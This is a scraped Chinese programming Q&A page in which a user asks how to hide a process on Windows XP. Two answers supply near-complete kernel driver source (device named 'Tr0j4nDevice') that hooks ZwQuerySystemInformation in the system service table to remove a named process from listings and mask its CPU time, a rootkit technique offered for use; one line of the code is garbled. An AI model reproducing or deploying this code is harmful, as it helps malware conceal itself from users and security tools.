如何隐藏进程_VC/MFC_编程问答

如何隐藏进程

来源:互联网  时间:2016/8/15 5:06:18

关于网友提出的“ 如何隐藏进程”问题疑问,本网通过在网上对“ 如何隐藏进程”有关的相关答案进行了整理,供用户进行参考,详细问题解答如下:

问题: 如何隐藏进程
描述:

请看:
typedef   DWORD   (CALLBACK*   LPR)(DWORD,DWORD);   
HINSTANCE   hDLL;   
LPR   lpRegisterServiceProcess;   
hDLL   =   LoadLibrary("kernel32.dll");   
lpRegisterServiceProcess   =   (LPR)GetProcAddress(hDLL,"RegisterServiceProcess");   
if(lpRegisterServiceProcess)
   lpRegisterServiceProcess(GetCurrentProcessId(),1);  
但据说这个代码必须在win98下运行,可是我的系统是XP,请问:该怎么隐藏进程?


解决方案1:


VOID DriverUnload(IN PDRIVER_OBJECT pDriverObject)
{
PDEVICE_OBJECT pNextObj;
PDEVICE_EXTENSION pDevExt;
UNICODE_STRING pLinkName;
DbgPrint("DriverUnload!\n");
UNHOOK_SYSCALL( ZwQuerySystemInformation, OldZwQuerySystemInformation, NewZwQuerySystemInformation );
   
    if(g_pmdlSystemCall)
    {
       MmUnmapLockedPages(MappedSystemCallTable, g_pmdlSystemCall);
       IoFreeMdl(g_pmdlSystemCall);
    }
pNextObj=pDriverObject->DeviceObject;
while(pNextObj!=NULL)
{
pDevExt=(PDEVICE_EXTENSION)pNextObj->DeviceExtension;
pLinkName=pDevExt->ustrSymLinkName;
IoDeleteSymbolicLink(&pLinkName);
pNextObj=pNextObj->NextDevice;
IoDeleteDevice(pDevExt->pDevice);
}
DbgPrint("DriverUnload Complete!\n");
}
NTSTATUS  DDKDispatchRoutine(
 IN PDEVICE_OBJECT pDeviceObj,
 IN PIRP pIrp)
{
NTSTATUS status=STATUS_SUCCESS;
DbgPrint("Enter  DDKDispatchRoutine \n");
DbgPrint("Leave DispatchRoutine\n");
return status;
}
NTSTATUS DDKDeviceIoControl(IN PDEVICE_OBJECT pDevObj,
IN PIRP pIrp)
{
NTSTATUS status = STATUS_SUCCESS;
UNICODE_STRING uniStr;
ANSI_STRING aniStr;
PIO_STACK_LOCATION stack;
ULONG cbin,cbout,code,info;
DbgPrint(("Enter DeviceIOControl\n"));
stack = IoGetCurrentIrpStackLocation(pIrp);
cbin = stack->Parameters.DeviceIoControl.InputBufferLength;
cbout = stack->Parameters.DeviceIoControl.OutputBufferLength;
//得到IOCTL码
code = stack->Parameters.DeviceIoControl.IoControlCode;
info = cbout;
switch (code)
{ // process request
case  IOCTL_FUCK:
{
DbgPrint(" IOCTL_FUCK\n");
//缓冲区方式IOCTL
//显示输入缓冲区数据
InputBuffer = (UCHAR *)pIrp->AssociatedIrp.SystemBuffer;
DbgPrint("length is %d %d\n",cbin,cbout);
DbgPrint("The input buffer is %s\n",InputBuffer);
RtlInitAnsiString(&aniStr,InputBuffer);
RtlAnsiStringToUnicodeString(&uniStr,&aniStr,TRUE);
Pr />
//操作输出缓冲区
//设置实际操作输出缓冲区长度
info = cbout;
break;
}
default:
status = STATUS_INVALID_VARIANT;
}
// 完成IRP
pIrp->IoStatus.Status = status;
pIrp->IoStatus.Information = info;
IoCompleteRequest( pIrp, IO_NO_INCREMENT );
MappedSystemCallTable = MmMapLockedPages(g_pmdlSystemCall, KernelMode);
    HOOK_SYSCALL( ZwQuerySystemInformation, NewZwQuerySystemInformation, OldZwQuerySystemInformation );
return status;
}
#pragma INITCODE
NTSTATUS DriverEntry(
 IN PDRIVER_OBJECT pDriverObject,
 IN PUNICODE_STRING pRegistryPath)
{
NTSTATUS status;
pDriverObject->DriverUnload=DriverUnload;
DbgPrint("DriverEntry Started!\n");
status=CreateDevice(pDriverObject);
pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL]=DDKDeviceIoControl;
pDriverObject->MajorFunction[IRP_MJ_CREATE]=DDKDispatchRoutine;
pDriverObject->MajorFunction[IRP_MJ_CLOSE]=DDKDispatchRoutine;
pDriverObject->MajorFunction[IRP_MJ_READ]=DDKDispatchRoutine;
pDriverObject->MajorFunction[IRP_MJ_WRITE]=DDKDispatchRoutine;
pDriverObject->MajorFunction[IRP_MJ_CLEANUP]=DDKDispatchRoutine;
pDriverObject->MajorFunction[IRP_MJ_SET_INFORMATION]=DDKDispatchRoutine;
pDriverObject->MajorFunction[IRP_MJ_SHUTDOWN]=DDKDispatchRoutine;
pDriverObject->MajorFunction[IRP_MJ_SYSTEM_CONTROL]=DDKDispatchRoutine;
    m_UserTime.QuadPart = m_KernelTime.QuadPart = 0;
 OldZwQuerySystemInformation =(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation));
    g_pmdlSystemCall = MmCreateMdl(NULL, KeServiceDescriptorTable.ServiceTableBase, KeServiceDescriptorTable.NumberOfServices*4);
    if(!g_pmdlSystemCall)
       return STATUS_UNSUCCESSFUL;
    MmBuildMdlForNonPagedPool(g_pmdlSystemCall);
    g_pmdlSystemCall->MdlFlags = g_pmdlSystemCall->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;
DbgPrint("DriverEntry Ended!\n");
return STATUS_SUCCESS;
}

解决方案2:

帮助你下吧,我把我硬盘里的那个代码就吐血奉献出来给你了。


#pragma once
#include <ntddk.h>
#include "drvcommon.h"
#include "drvversion.h"
#define INITCODE code_seg("INIT")
#define IOCTL_FUCK CTL_CODE(\
FILE_DEVICE_UNKNOWN, \
0x800, \
METHOD_BUFFERED, \
FILE_ANY_ACCESS)
typedef struct _DEVICE_EXTENSION{
PDEVICE_OBJECT pDevice;
UNICODE_STRING ustrDeviceName;
UNICODE_STRING ustrSymLinkName;
}DEVICE_EXTENSION,*PDEVICE_EXTENSION;
typedef struct ServiceDescriptorEntry {
         unsigned int *ServiceTableBase;
         unsigned int *ServiceCounterTableBase; 
         unsigned int NumberOfServices;
         unsigned char *ParamTableBase;
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
__declspec(dllimport)   ServiceDescriptorTableEntry_t KeServiceDescriptorTable;
#define SYSTEMSERVICE(_function)   KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_function+1)]
PMDL   g_pmdlSystemCall;
PVOID  *MappedSystemCallTable;
UCHAR* InputBuffer;
PWSTR ProName;
#define SYSCALL_INDEX(_Function) *(PULONG)((PUCHAR)_Function+1)
#define HOOK_SYSCALL(_Function, _Hook, _Orig )   \
        _Orig = (PVOID) InterlockedExchange( (PLONG) &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook)
#define UNHOOK_SYSCALL(_Function, _Hook, _Orig )   \
        InterlockedExchange( (PLONG) &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook)
struct _SYSTEM_THREADS
{
         LARGE_INTEGER            KernelTime;
         LARGE_INTEGER            UserTime;
         LARGE_INTEGER            CreateTime;
         ULONG                            WaitTime;
         PVOID                            StartAddress;
         CLIENT_ID                        ClientIs;
         KPRIORITY                        Priority;
         KPRIORITY                        BasePriority;
         ULONG                            ContextSwitchCount;
         ULONG                            ThreadState;
         KWAIT_REASON             WaitReason;
};
struct _SYSTEM_PROCESSES
{
         ULONG                            NextEntryDelta;
         ULONG                            ThreadCount;
         ULONG                            Reserved[6];
         LARGE_INTEGER            CreateTime;
         LARGE_INTEGER            UserTime;
         LARGE_INTEGER            KernelTime;
         UNICODE_STRING           ProcessName;
         KPRIORITY                        BasePriority;
         ULONG                            ProcessId;
         ULONG                            InheritedFromProcessId;
         ULONG                            HandleCount;
         ULONG                            Reserved2[2];
         VM_COUNTERS                      VmCounters;
         IO_COUNTERS                      IoCounters; 
         struct _SYSTEM_THREADS           Threads[1];
};
struct _SYSTEM_PROCESSOR_TIMES
{
     LARGE_INTEGER           IdleTime;
     LARGE_INTEGER           KernelTime;
     LARGE_INTEGER           UserTime;
     LARGE_INTEGER           DpcTime;
     LARGE_INTEGER           InterruptTime;
     ULONG               InterruptCount;
};
NTSYSAPI
NTSTATUS
NTAPI ZwQuerySystemInformation(
             IN ULONG SystemInformationClass,
                         IN PVOID SystemInformation,
                         IN ULONG SystemInformationLength,
                         OUT PULONG ReturnLength);
typedef NTSTATUS (*ZWQUERYSYSTEMINFORMATION)(
             ULONG SystemInformationCLass,
                         PVOID SystemInformation,
                         ULONG SystemInformationLength,
                         PULONG ReturnLength
);
ZWQUERYSYSTEMINFORMATION         OldZwQuerySystemInformation;
LARGE_INTEGER           m_UserTime;
LARGE_INTEGER           m_KernelTime;
NTSTATUS NewZwQuerySystemInformation(
             IN ULONG SystemInformationClass,
             IN PVOID SystemInformation,
             IN ULONG SystemInformationLength,
             OUT PULONG ReturnLength)
{
    NTSTATUS ntStatus;
    ntStatus = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation)) (
           SystemInformationClass,
           SystemInformation,
           SystemInformationLength,
           ReturnLength );
    if( NT_SUCCESS(ntStatus)) 
    {
       
       if(SystemInformationClass == 5)
       {
     
      struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
             struct _SYSTEM_PROCESSES *prev = NULL;
     
      while(curr)
      {
             
       if (curr->ProcessName.Buffer != NULL)
       {
         if(0 == memcmp(curr->ProcessName.Buffer,ProName, wcslen(ProName)))
         {
           m_UserTime.QuadPart += curr->UserTime.QuadPart;
           m_KernelTime.QuadPart += curr->KernelTime.QuadPart;
           if(prev) 
           {
             if(curr->NextEntryDelta)
               prev->NextEntryDelta += curr->NextEntryDelta;
             else   
               prev->NextEntryDelta = 0;
           }
           else
           {
             if(curr->NextEntryDelta)
             {
               
               (char *)SystemInformation += curr->NextEntryDelta;
             }
             else 
               SystemInformation = NULL;
           }
         }
       }
       else 
       {
          
          
          curr->UserTime.QuadPart += m_UserTime.QuadPart;
          curr->KernelTime.QuadPart += m_KernelTime.QuadPart;
          
          m_UserTime.QuadPart = m_KernelTime.QuadPart = 0;
       }
       prev = curr;
         if(curr->NextEntryDelta) ((char *)curr += curr->NextEntryDelta);
         else curr = NULL;
        }
     }
     else if (SystemInformationClass == 8) 
     {
          struct _SYSTEM_PROCESSOR_TIMES * times = (struct _SYSTEM_PROCESSOR_TIMES *)SystemInformation;
          times->IdleTime.QuadPart += m_UserTime.QuadPart + m_KernelTime.QuadPart;
     }
    }
    return ntStatus;
}
NTSTATUS CreateDevice(
 IN PDRIVER_OBJECT pDriverObject)
{
NTSTATUS status;
PDEVICE_OBJECT pDevObj;
PDEVICE_EXTENSION pDevExt;
UNICODE_STRING szDevName,symLinkName;
RtlInitUnicodeString(&szDevName,L"\\Device\\Tr0j4nDevice");
status=IoCreateDevice(pDriverObject,
sizeof(DEVICE_EXTENSION),
&szDevName,
FILE_DEVICE_UNKNOWN,
FILE_DEVICE_SECURE_OPEN,
TRUE,
&pDevObj);
if(!NT_SUCCESS(status))
{
DbgPrint("IoCreateDevice UnOK!\n");
return status;
}
else
DbgPrint("IoCreateDevice OK!\n");
pDevObj->Flags|=DO_BUFFERED_IO;
pDevExt=(PDEVICE_EXTENSION)pDevObj->DeviceExtension;
pDevExt->pDevice=pDevObj;
pDevExt->ustrDeviceName=szDevName;
RtlInitUnicodeString(&symLinkName,L"\\??\\Tr0j4n");
pDevExt->ustrSymLinkName=symLinkName;
status=IoCreateSymbolicLink(&symLinkName,&szDevName);
if(!NT_SUCCESS(status))
{
DbgPrint("IoCreateSymbolicLink UnOK");
IoDeleteDevice(pDevObj);
return status;
}
else
DbgPrint("IoCreateSymbolicLink OK");
return STATUS_SUCCESS;
}

解决方案3:

http://www.csip.com.cn/26/n-36926.html

上一篇widnows下是每个线程都有一个栈,还是共享进程的栈?我倾向于前者
下一篇线程里怎么用mci_stop结束播放的音乐
明星图片
相关文章
《 如何隐藏进程》由码蚁之家搜集整理于网络,
联系邮箱:mxgf168#qq.com(#改为@)